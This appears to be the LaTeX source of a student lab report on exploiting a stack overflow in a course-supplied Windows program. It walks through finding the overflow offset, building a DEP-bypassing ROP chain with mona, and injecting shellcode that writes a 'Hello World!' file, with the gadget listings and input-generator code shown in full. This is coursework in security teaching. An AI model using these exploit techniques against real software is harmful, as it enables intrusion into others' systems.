\documentclass[UTF8]{ctexart}
\ctexset{section/format=\Large\bfseries}

% Packages
% font
\usepackage{fontspec}
\setmonofont{Fira Code}[
Contextuals=Alternate  % Activate the calt feature
]
% tikz
\usepackage{tikz}
\usepackage{graphicx}
% listing
\usepackage{listings}
\usepackage{lstfiracode}
\input{./latex-listing-powershell.tex}
% margins
\usepackage{geometry}
\geometry{a4paper,  scale=0.7}
% page header and footer
\usepackage{fancyhdr}
\usepackage{float}
\pagestyle{fancy}
\rhead{}

% For table alignment
\usepackage{array}
% multirow table
\usepackage{multirow}

% Hyper references
\usepackage{hyperref}

%subfigure
\usepackage{subfigure}

\usepackage{caption}

\let\oldparagraph\paragraph
\renewcommand{\paragraph}[1]{\oldparagraph{#1} \mbox{}\\}

\lstset{
	columns=fixed,
	style=FiraCodeStyle,
	basicstyle=\small\ttfamily,
	backgroundcolor=\color[RGB]{244,244,244}, 		  % 设定背景颜色：浅晦涩，近透明
	keywordstyle=\color[RGB]{40,40,255},			  % 设定关键字颜色
	commentstyle=\color[RGB]{0,96,96},                % 设置代码注释的格式
	stringstyle=\color[RGB]{128,0,0},                 % 设置字符串格式
}

\begin{document}
    \title{栈溢出漏洞实验}
    \author{}
    \date{\vspace{-8ex}}
    \maketitle
    
    \begin{table}[h]
    \centering	
        \begin{tabular}{|p{2.5cm}<{\centering}|p{4.5cm}<{\centering}|p{3cm}<{\centering}|p{2.5cm}<{\centering}|}
            \hline
            \textbf{课程名称} & 软件安全         & \textbf{实验日期} & 2022.11.19   \\ \hline
            \textbf{姓名}   & \textbf{学号}   & \textbf{专业}   & \textbf{班级} \\ \hline
            李心杨           & 2020302181022 & 信息安全          & 2           \\
            林锟扬           & 2020302181032 & 信息安全          & 2           \\
            上官景威      &  2020302181069 & 信息安全          & 3           \\ \hline
        \end{tabular}
    \end{table}
    
    \tableofcontents
    \pagebreak
	
    \section{实验任务}
    给定一包含栈溢出漏洞的 Windows 程序（下称测试程序），要求利用其漏洞，执行自己提供的 shellcode，该 shellcode 的功能任意，只要能直观判别出其执行效果即可。

    测试程序说明：该程序是用 VS2017 编写，分别在 64-bit 的 Windows 10 家庭中文版和 32-bit Windows7 旗舰版中测试通过。如果运行时提示缺某个动态链接库，请安装 VC\_2015-2019\_redist.x86.exe后再试。
    
    \section{实验分析}
    \subsection{实验环境}

    Windows 10 (64 bit)
    
    Visual Studio 2019

    Python 2.7.2

    WinDbg 10.0.19041.685 X86

    windbglib on commit: \href{https://github.com/corelan/windbglib/tree/d20b3036547886ff6beb616d24927febfa491e93}{d20b303654}

    mona on commit: \href{https://github.com/corelan/mona/tree/c19c74c862f5b5c6368061c2108b5650072d4ed6}{c19c74c862}
    
    \subsection{溢出点定位}
    以一定规律生成输入文件，然后使用 windbg 查看出错时的地址即可。

    生成输入文件的代码如下:

    \begin{lstlisting}[language=c, caption={测试溢出点}, captionpos=b]
#include <stdio.h>
#include <string.h>

typedef unsigned int u32;

int main() {
    FILE *fp = fopen("test.bin", "wb");
    for(u32 i = 0; i < 0x100; i++) {
        u32 x;
        memset(&x, i, sizeof(x));
        fwrite(&x, 1, sizeof(x), fp);
    }
    fclose(fp);
    return 0;
}
    \end{lstlisting}
    
    在 windbg 中调试，可以发现被覆盖的返回地址是 0x32323232。后面在利用漏洞时，就从此处开始:

    \begin{figure}[H]
        \centering
        \includegraphics[width=\linewidth]{.asset/溢出点测试.png}
        \caption{溢出点测试}
        \label{fig:test1}
    \end{figure}

    此外，我们还可以观察到，此时的栈顶的元素并不是 0x33333333，而是 0x35353535。这意味着程序最后执行的指令不是简单的 \lstinline{ret}，而是 \lstinline{retn 8h}.

    \begin{figure}[H]
        \centering
        \includegraphics[width=\linewidth]{.asset/溢出点测试2.png}
        \caption{溢出点测试2}
        \label{fig:test2}
    \end{figure}

    \subsection{绕过 DEP 保护}

    \subsubsection{ROP 技术原理}
    使用 ROP 技术，可以绕过 DEP 保护。
    
    它的原理是利用本就存在于内存中的各个模块的可执行代码，构造合适的堆栈，通过 \lstinline{ret} 在代码间的切换，最终实现想要的执行目标。此处，我们想执行的函数是 \lstinline{VirtualProtect}。

    由于 \lstinline{ret} 前的指令可能性比较有限，大多数为针对寄存器的操作。所以在实际构造时，往往是将想要传的参数想办法写入到寄存器中。然后再利用 \lstinline{pushad} 以一定的顺序一次性写入到栈顶。

    rop 链的构造需要搜索程序加载的模块，寻找可以使用的语句，并进行尝试和拼凑。

    \subsubsection{为 WinDbg 安装 mona 插件}
    安装该插件前，需要为 WinDbg 安装 pykd 插件。具体安装过程可以参考 \href{https://github.com/corelan/windbglib#windows-7-and-up-64bit-os-32bit-windbg}{windbglib 的 GitHub 页面}。

    大致是下面的步骤:

    \begin{enumerate}
        \item 前往\href{https://www.python.org/downloads}{官网}安装 Python 2.7 (2.7.14 以上)。
        
        \item 在 \href{https://github.com/corelan/windbglib}{windbglib 的 GitHub 页面} 下载 \href{https://github.com/corelan/windbglib/raw/master/pykd/pykd.zip}{pykd.zip}，运行 vcredist\_x86.exe，修复或安装 Microsoft Vistual C++ Redistributable。

        \item 将 pykd.pyd 复制到 WinDbg 的 winext 目录下，如: \lstinline{C:\Program Files (x86)\Windows Kits\8.0\Debuggers\x86\winext}。

        \item 在拥有管理员权限的 cmd 窗口下运行下面指令注册组件:

        \begin{lstlisting}
c:
cd "C:\Program Files (x86)\Common Files\Microsoft Shared\VC"
regsvr32 msdia90.dll
        \end{lstlisting}

        \item 下载 \href{https://github.com/corelan/windbglib/raw/master/windbglib.py}{windbglib.py} 和 \href{https://github.com/corelan/mona/raw/master/mona.py}{mona.py}，并复制到 WinDbg 目录下，如: \lstinline{C:\Program Files (x86)\Windows Kits\8.0\Debuggers\x86}。
    \end{enumerate}

    接下来，就可以在 WinDbg 下使用 mona 插件了 (参考 \href{https://github.com/corelan/windbglib#running-mona}{windbglib 的 GitHub 页面}):

    \begin{lstlisting}
.load pykd.pyd
!py mona
    \end{lstlisting}

    \subsubsection{使用 mona 插件构造 ROP 链}

    在 WinDbg 的命令窗口，输入 \lstinline{!py mona help rop} 即可查看 mona rop 可以使用的参数。这里我们使用下面的指令:

    \begin{lstlisting}
!py mona rop -m *.dll -cp nonull
    \end{lstlisting}

    执行时可能会遇到下面的报错:

    \begin{figure}[H]
        \centering
        \includegraphics[width=\linewidth]{.asset/报错1.png}
        \caption{mona 执行报错}
        \label{fig: error mona}
    \end{figure}

    这其实是找不到 experiment04 这个模块导致的。结合经验，不难推测，这个 experiment04 是老师给的这个测试程序生成时原本的名字，可能是因为被改了名导致程序无法找到 experiment04 对应的文件。

    将程序 \lstinline{（实验三）exp2022.exe} 重命名为 \lstinline{experiment04.exe} 即可。
    
    插件需要运行较长的时间，需要耐心等待。

    \subsubsection{测试调整 ROP 链}
    
    通过 mona 插件获取的 ROP 链如下 (来自 rop\_chains.txt，它会被生成在 \lstinline{Windows Kits\version\Debuggers} 下):

    \begin{lstlisting}[language=c, caption={原始 ROP 链}, captionpos=b]
unsigned int rop_gadgets[] = {
  //[---INFO:gadgets_to_set_ebp:---]
  0x7708c6f0,  // POP EBP // RETN [KERNELBASE.dll] ** REBASED ** ASLR 
  0x7708c6f0,  // skip 4 bytes [KERNELBASE.dll] ** REBASED ** ASLR
  //[---INFO:gadgets_to_set_ebx:---]
  0x758a35c0,  // POP EAX // RETN [USER32.dll] ** REBASED ** ASLR 
  0xfffffdff,  // Value to negate, will become 0x00000201
  0x76d71d4c,  // NEG EAX // RETN [combase.dll] ** REBASED ** ASLR 
  0x6d184078,  // XCHG EAX,EBX // RETN [gdiplus.dll] ** REBASED ** ASLR 
  //[---INFO:gadgets_to_set_edx:---]
  0x7467fcd0,  // POP EAX // RETN [OLEACC.dll] ** REBASED ** ASLR 
  0xffffffc0,  // Value to negate, will become 0x00000040
  0x764addcd,  // NEG EAX // RETN [SHELL32.dll] ** REBASED ** ASLR 
  0x76de9450,  // XCHG EAX,EDX // RETN [combase.dll] ** REBASED ** ASLR 
  //[---INFO:gadgets_to_set_ecx:---]
  0x6e630b9f,  // POP ECX // RETN [COMCTL32.dll] ** REBASED ** ASLR 
  0x75c6b10c,  // &Writable location [IMM32.dll] ** REBASED ** ASLR
  //[---INFO:gadgets_to_set_edi:---]
  0x7666d77a,  // POP EDI // RETN [SHELL32.dll] ** REBASED ** ASLR 
  0x76d4200c,  // RETN (ROP NOP) [combase.dll] ** REBASED ** ASLR
  //[---INFO:gadgets_to_set_esi:---]
  0x76ea6522,  // POP ESI // RETN [combase.dll] ** REBASED ** ASLR 
  0x759ff4c7,  // JMP [EAX] [COMDLG32.dll]
  0x6f3bbae9,  // POP EAX // RETN [UxTheme.dll] ** REBASED ** ASLR 
  0x76c513c4,  // ptr to &VirtualProtect() [IAT KERNEL32.DLL] ** REBASED ** ASLR
  //[---INFO:pushad:---]
  0x76ce1053,  // PUSHAD // RETN [combase.dll] ** REBASED ** ASLR 
  //[---INFO:extras:---]
  0x75a0d59c,  // ptr to 'push esp // ret ' [COMDLG32.dll] ** REBASED ** ASLR
};
    \end{lstlisting}

    现在我们需要对它进行一定的调整。

    首先，我们知道溢出点在 $0x32 \times 4$ 字节处。且最后执行的指令是 \lstinline{retn 8h}。因此，我们需要在前面填充足够的数据，并在 ROP 链的第一个地址后面填充 8 个字节的空隙来让 retn 跳过:

    \begin{lstlisting}[language=c, caption={填充字节}, captionpos=b]
u32 rop_chain[] = {
    // fill blank
    0x00000000, 0x01010101, 0x02020202, 0x03030303, 0x04040404, 
    ...
    0x2d2d2d2d, 0x2e2e2e2e, 0x2f2f2f2f, 0x30303030, 0x31313131,
    //[---INFO:gadgets_to_set_ebp:---]
    0x7708c6f0,  // POP EBP // RETN [KERNELBASE.dll] ** REBASED ** ASLR 
    0,
    0, // 8 bytes for `retn 8h'
    0x7708c6f0,  // skip 4 bytes [KERNELBASE.dll] ** REBASED ** ASLR
    ...
};
    \end{lstlisting}
    
    此外，由于每次重新启动计算机时，Module Base 会发生变化，因此我额外创建了两个数组，用于生成原始 rop 链时的 Module Base 和当前运行时的 Module Base。

    原始 Module Base 可以在 rop\_chains.txt 的 Module Info 查到。而当前的则可以在 Windbg 下使用 \lstinline{lm} 查询，或是查看程序加载时控制台的 ModLoad 输出。

    \begin{lstlisting}[language=c, caption={Rebase}, captionpos=b]
u32 old_base[] = {
    ...
    //[---INFO:gadgets_to_set_ebp:---]
    0x76f80000,  // POP EBP // RETN [KERNELBASE.dll] ** REBASED ** ASLR 
    0,
    0,
    0x76f80000,  // skip 4 bytes [KERNELBASE.dll] ** REBASED ** ASLR
    //[---INFO:gadgets_to_set_ebx:---]
    0x75850000,  // POP EAX // RETN [USER32.dll] ** REBASED ** ASLR 
    0xfffffdff,  // Value to negate, will become 0x00000201
    0x76cc0000,  // NEG EAX // RETN [combase.dll] ** REBASED ** ASLR 
    ...
};

u32 new_base[] = {
    ...
    //[---INFO:gadgets_to_set_ebp:---]
    0x76d60000,  // POP EBP // RETN [KERNELBASE.dll] ** REBASED ** ASLR 
    0,
    0,
    0x76d60000,  // skip 4 bytes [KERNELBASE.dll] ** REBASED ** ASLR
    //[---INFO:gadgets_to_set_ebx:---]
    0x76bc0000,  // POP EAX // RETN [USER32.dll] ** REBASED ** ASLR 
    0xfffffdff,  // Value to negate, will become 0x00000201
    0x76260000,  // NEG EAX // RETN [combase.dll] ** REBASED ** ASLR 
    ...
};
    \end{lstlisting}
    
    需要 Rebase 的地址在插件生成 rop\_chains 时都有注释注明其作用和依据的模块，依此手动调整即可。

    接下来，使用类似前面定位溢出点时生成输入文件的方式生成输入文件:

    \begin{lstlisting}[language=c, caption={生成 ROP Chain 测试文件}, captionpos=b]
int main() {
    ...
// Set Rop Chain
    int siz = sizeof(rop_chain) / sizeof(u32);
    for(int i = 0; i < siz; i++) {
        u32 x = rop_chain[i] - old_base[i] + new_base[i];
        fwrite(&x, 1, sizeof(x), fp);
#ifdef DEBUG
        fprintf(fd, "%#.8x\n", x);
#endif
    }
    // Set Shell Code
    fwrite(shellCode, 1, CODE_SIZE, fp);
    ...
}
    \end{lstlisting}

    如果能顺利执行到最后的 \lstinline{push esp} 部分并运行 esp 处的指令。说明 ROP 链成功了。

    上面的代码中将写入数据的 16 进制形式输出到一个 log 文件中，是为了方便查看 Rebase 后的地址，方便进行调试。

    在调试中，我们注意到 mona 找到的 \lstinline{&VirtualProtect()} 是错误的。它指向的并不是 \lstinline{VirtualProtect()} 而是 \lstinline{VirtualLock()}。

    通过观察，mona 找到的是 \lstinline{KERNEL32!_imp__VirtualLock}，效仿这个格式，输入下面的指令:

    \begin{lstlisting}
x KERNEL32!_imp__VirtualProtect
    \end{lstlisting}

    就可以显示出它的地址。然后计算出它在 old\_base 下的地址，修改到 rop\_chains 数组中即可。

    经过调整后，程序可以正常执行到最后的 push esp 处，并执行堆栈中的指令:

    \begin{figure}[H]
        \centering
        \includegraphics[width=\linewidth]{.asset/正确执行.png}
        \caption{正确调整 ROP Chain}
        \label{fig: rop chain}
    \end{figure}

    \subsection{设计 ShellCode}

    Shell Code 的设计在上一个实验的 junior 基础上做修改。上一个实验 (PE 病毒) 的项目地址是: \href{https://github.com/Qing-LKY/PE-Virus}{https://github.com/Qing-LKY/PE-Virus}。

    主体功能修改为创建一个名为 2020302181032.txt 的文件并写入 ``Hello World!''。

    \begin{lstlisting}[language=c, caption={Shell Code 主体}, captionpos=b]
__forceinline void CreateText(SCSB *sb) {
    char sHello[] = {'H', 'e', 'l', 'l', 'o', ' ', 'W', 'o', 'r', 'l', 'd', '!', 0};
    char sText[] = {'2', '0', '2', '0', '3', '0', '2', '1', '8', '1', '0', '3', '2', '.', 't', 'x', 't', 0};
    HANDLE hf = CreateFileA(
        sText, GENERIC_WRITE,
        0, NULL,
        CREATE_ALWAYS, FILE_ATTRIBUTE_ARCHIVE,
        NULL
    );
    if(hf == NULL) return;
    WriteFile(hf, sHello, 12, NULL, NULL);
    CloseHandle(hf);
    return;
}

void ShellCode() {
    SCSB super_block;
    SCSB *sb = &super_block;
    PPEB peb;
    PBYTE imageBase;
    // get peb
    __asm {
        mov eax, fs:[30h];
        mov peb, eax
    }
    // get imageBase
    imageBase = (PBYTE)peb->Reserved3[1];
    // Get funtion pointer
    GetAllFunc(peb, sb);
    CreateText(sb);
    // ExitProcess(0);
    return;
}
    \end{lstlisting}

    \subsection{完善恶意文件}

    刚才生成的输入中只有 ROP Chain，我们还需要在后面加上要执行的 ShellCode。
    
    使用上个实验的工具将 Shell Code 提取为机器码和 C 语言数组:

    \begin{lstlisting}[caption={来自 project.bat}, captionpos=b]
cl /c /GS- /Ob1 code.c
link /entry:ShellCode /subsystem:console code.obj
%tool%\dump.exe /f:code.exe /s:.code /ob:code.bin
%tool%\trans.exe code.bin > %root%\shellcode.c
    \end{lstlisting}

    然后在输入生成器 gen.c 中添加如下代码:
    
    \begin{lstlisting}[language=c, caption={完善输入文件}, captionpos=b]
#include "shellcode.c"
// Set Shell Code
fwrite(shellCode, 1, CODE_SIZE, fp);
    \end{lstlisting}

    接下来只要运行 gen.exe 就可以生成完整的输入文件了。

    上述过程被集成在了 project.bat 中。

    \subsection{\textbf{补充}: 基于程序自身构造 ROP 链}

    在上面的实验中，我们在 dll 中搜索构造 ROP 链，不仅耗时长，而且每次重启电脑都需要重新手动调整。

    在本实验中，老师提供的测试程序 experiment04.exe 是关闭了 ASLR 的 (地址空间布局随机化，用于增大缓冲区溢出攻击的难度)。

    关闭了 ASLR 之后，Import Directory (函数导出表 IAT) 的 VA 地址是固定的，因此 ptr to \lstinline{&VirtualProtect} 的地址是固定的。程序的 ImageBase 也是固定的，而链上的其它地址都来自程序本身，因此它们也是固定的。

    搜索时，使用的指令如下:

    \begin{lstlisting}
!py mona rop -m experiment04.exe
    \end{lstlisting}

    用这种方式找到的 ROP 链中的 ptr 没有 BUG。

    \section{成果展示}
    \subsection{项目地址}

    项目地址: \href{https://github.com/Qing-LKY/Lab-Stack-Overflow}{https://github.com/Qing-LKY/Lab-Stack-Overflow}。

    ShellCode 源码在: /shellcode/code.bin。

    \subsection{实验效果}

    \begin{figure}[H]
        \centering
        \includegraphics[width=13cm]{.asset/选择漏洞利用文件.png}
        \caption{实验截图 1}
        \label{fig:lab1}
    \end{figure}

    \begin{figure}[H]
        \centering
        \includegraphics[width=13cm]{.asset/生成了目标文件.png}
        \caption{实验截图 2}
        \label{fig:lab2}
    \end{figure}
    
\end{document}